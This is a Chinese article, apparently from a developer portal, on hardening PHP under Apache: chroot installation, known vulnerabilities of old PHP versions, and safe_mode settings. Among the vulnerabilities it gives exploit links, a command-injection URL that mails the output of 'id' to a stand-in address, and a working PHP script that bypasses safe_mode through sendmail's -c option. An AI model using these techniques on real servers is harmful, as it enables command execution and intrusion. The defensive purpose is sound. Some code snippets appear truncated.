• 丰搜首页
• 文档中心
• 视频中心
• 丰搜贴吧
• 问题集锦
• 更多功能

选择显示字体大小

• 最大
• 较大
• 标准

安全配置你的php文件上传

一、web服务器安全

　　php其实不过是web服务器的一个模块功能，所以首先要保证web服务器的安全。当然web服务器要安全又必须是先保证系统安全，这样就扯远了，无穷无尽。php可以和各种web服务器结合，这里也只讨论apache。 非常建议以chroot方式安装启动apache，这样即使apache和php及其脚本出现漏洞，受影响的也只有这个禁锢的系统，不会危害实际系统。但是使用chroot的apache后，给应用也会带来一定的麻烦，比如连接mysql时必须用127.0.0.1地址使用tcp连接而不能用localhost实现socket连接，这在效率上会稍微差一点。还有mail函数发送邮件也是个问题，因为php.ini里的：

　　[mail function]

　　; for win32 only.

　　smtp = localhost

　　; for win32 only.

　　sendmail_from = me@localhost.com

　　都是针对win32平台，所以需要在chroot环境下调整好sendmail。 　　

　　二、php本身问题

　　1、远程溢出

　　php-4.1.2以下的所有版本都存在文件上传远程缓冲区溢出漏洞，而且攻击程序已经广泛流传，成功率非常高：

　　http://packetstormsecurity.org/0204-exploits/7350fun

　　http://hsj.shadowpenguin.org/misc/php3018_exp.txt

　　2、远程拒绝服务

　　php-4.2.0和php-4.2.1存在php multipart/form-data post请求处理远程漏洞，虽然不能获得本地用户权限，但是也能造成拒绝服务。

　　3、safe_mode绕过漏洞

　　还有php-4.2.2以下到php-4.0.5版本都存在php mail函数绕过safe_mode限制执行命令漏洞，4.0.5版本开始mail函数增加了第五个参数，由于设计者考虑不周可以突破safe_mode的限制执行命令。其中4.0.5版本突破非常简单，只需用分号隔开后面加shell命令就可以了，比如存在php脚本evil.php：

　　

　　执行如下的url：

　　http://foo.com/evil.php?bar=;/usr/bin/id　mail evil@domain.com

　　这将id执行的结果发送给evil@domain.com。

　　对于4.0.6至4.2.2的php突破safe_mode限制其实是利用了sendmail的-c参数，所以系统必须是使用sendmail。如下的代码能够突破safe_mode限制执行命令：

　　
　　#注意，下面这两个必须是不存在的，

　　或者它们的属主和本脚本的属主是一样

　　$script="/tmp/script123";

　　$cf="/tmp/cf123";

　　$fd = fopen($cf, "w");

　　fwrite($fd, "oq/tmp

　　sparse=0

　　r$*" . chr(9) . "$#local $@ $1 $: $1

　　mlocal, p=/bin/sh, a=sh $script");

　　fclose($fd);

　　$fd = fopen($script, "w");

　　fwrite($fd, "rm -f $script $cf; ");

　　fwrite($fd, $cmd);

　　fclose($fd);

　　mail("nobody", "", "", "", "-c$cf");

　　?>

　　还是使用以上有问题版本php的用户一定要及时升级到最新版本，这样才能消除基本的安全问题。

　　三、php本身的安全配置 　　

　　php的配置非常灵活，可以通过php.ini, httpd.conf, .htaccess文件（该目录必须设置了allowoverride all或options）进行设置，还可以在脚本程序里使用ini_set()及其他的特定的函数进行设置。通过phpinfo()和get_cfg_var()函数可以得到配置选项的各个值。 　　

　　如果配置选项是唯一php_ini_system属性的，必须通过php.ini和httpd.conf来修改，它们修改的是php的master值，但修改之后必须重启apache才能生效。其中php.ini设置的选项是对web服务器所有脚本生效，httpd.conf里设置的选项是对该定义的目录下所有脚本生效。

　　如果还有其他的php_ini_user, php_ini_perdir, php_ini_all属性的选项就可以使用.htaccess文件设置，也可以通过在脚本程序自身用ini_set()函数设定，它们修改的是local值，改了以后马上生效。但是.htaccess只对当前目录的脚本程序生效，ini_set()函数只对该脚本程序设置ini_set()函数以后的代码生效。各个版本的选项属性可能不尽相同，可以用如下命令查找当前源代码的main.c文件得到所有的选项，以及它的属性： 　　

　　# grep php_ini_ /php_src/main/main.c

　　在讨论php安全配置之前，应该好好了解php的safe_mode模式。 　　

　　1、safe_mode

　　safe_mode是唯一php_ini_system属性，必须通过php.ini或httpd.conf来设置。要启用safe_mode，只需修改php.ini： 　

　　safe_mode = on

　　或者修改httpd.conf，定义目录：

　　

　　 options followsymlinks

　　 php_admin_value safe_mode 1

　　

　　重启apache后safe_mode就生效了。启动safe_mode，会对许多php函数进行限制，特别是和系统相关的文件打开、命令执行等函数。

　　所有操作文件的函数将只能操作与脚本uid相同的文件，比如test.php脚本的内容为：

　　html")?>

　　几个文件的属性如下：

　　# ls -la

　　total 13

　　drwxr-xr-x 2 root root 104 jul 20 01:25 .

　　drwxr-xr-x 16 root root 384 jul 18 12:02 ..

　　-rw-r--r-- 1 root root 4110 oct 26 2002 index.html

　　-rw-r--r-- 1 www-data www-data 41 jul 19 19:14 test.php

　　在浏览器请求test.php会提示如下的错误信息：

　　warning: safe mode restriction in effect. the script whose uid/gid is 33/33 is not allowed to access ./index.html owned by uid/gid 0/0 in /var/www/test.php on line 1 　　

　　如果被操作文件所在目录的uid和脚本uid一致，那么该文件的uid即使和脚本不同也可以访问的，不知这是否是php的一个漏洞还是另有隐情。所以php脚本属主这个用户最好就只作这个用途，绝对禁止使用root做为php脚本的属主，这样就达不到safe_mode的效果了。 　　

　　如果想将其放宽到gid比较，则打开 safe_mode_gid可以考虑只比较文件的gid，可以设置如下选项：

　　safe_mode_gid = on 　　

　　设置了safe_mode以后，所有命令执行的函数将被限制只能执行php.ini里safe_mode_exec_dir指定目录里的程序，而且shell_exec、`ls -l`这种执行命令的方式会被禁止。如果确实需要调用其它程序，可以在php.ini做如下设置： 　　

　　safe_mode_exec_dir = /usr/local/php/exec

　　然后拷贝程序到该目录，那么php脚本就可以用system等函数来执行该程序。而且该目录里的shell脚本还是可以调用其它目录里的系统命令。 　　

　　safe_mode_include_dir string 　　

　　当从此目录及其子目录（目录必须在 include_path 中或者用完整路径来包含）包含文件时越过 uid/gid 检查。 　

　　从 php 4.2.0 开始，本指令可以接受和 include_path 指令类似的风格用分号隔开的路径，而不只是一个目录。 　　

　　指定的限制实际上是一个前缀，而非一个目录名。这也就是说“safe_mode_include_dir = /dir/incl”将允许访问“/dir/include”和“/dir/incls”，如果它们存在。如果您希望将访问控制在一个指定的目录，那么请在结尾加上一个斜线，例如：“safe_mode_include_dir = /dir/incl/”。 　　

　　safe_mode_allowed_env_vars string 　　

　　设置某些环境变量可能是潜在的安全缺口。本指令包含有一个逗号分隔的前缀列表。在安全模式下，用户只能改变那些名字具有在这里提供的前缀的环境变量。默认情况下，用户只能设置以 php_ 开头的环境变量（例如 php_foo = bar）。 　

　　注: 如果本指令为空，php 将使用户可以修改任何环境变量！　

　　safe_mode_protected_env_vars string 　　

　　本指令包含有一个逗号分隔的环境变量的列表，最终用户不能用 putenv() 来改变这些环境变量。甚至在 safe_mode_allowed_env_vars 中设置了允许修改时也不能改变这些变量。 　

　　虽然safe_mode不是万能的（低版本的php可以绕过），但还是强烈建议打开安全模式，在一定程度上能够避免一些未知的攻击。不过启用safe_mode会有很多限制，可能对应用带来影响，所以还需要调整代码和配置才能和谐。被安全模式限制或屏蔽的函数可以参考php手册。 　　

　　讨论完safe_mode后，下面结合程序代码实际可能出现的问题讨论如何通过对php服务器端的配置来避免出现的漏洞。

　　（未完）

关键字 本文所属关键字

相关 与本文相关文章

分类 所有文章关键字导航

源码编程相关

Java   Asp   PHP   .Net   XML   C/C++   CGI   VB   Jsp   J2ee   J2se   J2me   EJB   Servlet   Tomcat   Resin   Struts   Weblogic   Eclipse   ANT   GUI   JMS   Web servise   IDEA   Webphere   Hibernate   Spring   Jboss   Applet   Swing   Socket   Javamail   Perl   Ajax   P2P   安全   模式   框架   测试   开源   游戏

SQL数据库相关

My-SQL   Ms-SQL   Access   DB2   Oracle   Sybase   SQLserver   索引   存储过程   加密   数据库   分页   视图  

手机无线相关

3G   Wap   CDMA   GRPS   GSM   IVR   彩信   短信   无线   增值业务

网页设计制作相关

HTML   CSS   网页配色   网页特效   Javascript   VBscript   Dreamweaver   Frontpage   JS   Web   网站设计

网站建设推广相关

建站经验   网站优化   网站排名   推广   Alexa

操作系统/服务器相关

Windows XP   Windows 2000   Windows 2003   Windows Me   Windows 9.x   Linux   UNIX   注册表   操作系统   服务器   应用服务器

图形图像多媒体相关

Photoshop   Fireworks   Flash   Coreldraw   Illustrator   Freehand   Photoimpact   多媒体   图形图像

标准 网站致力的规范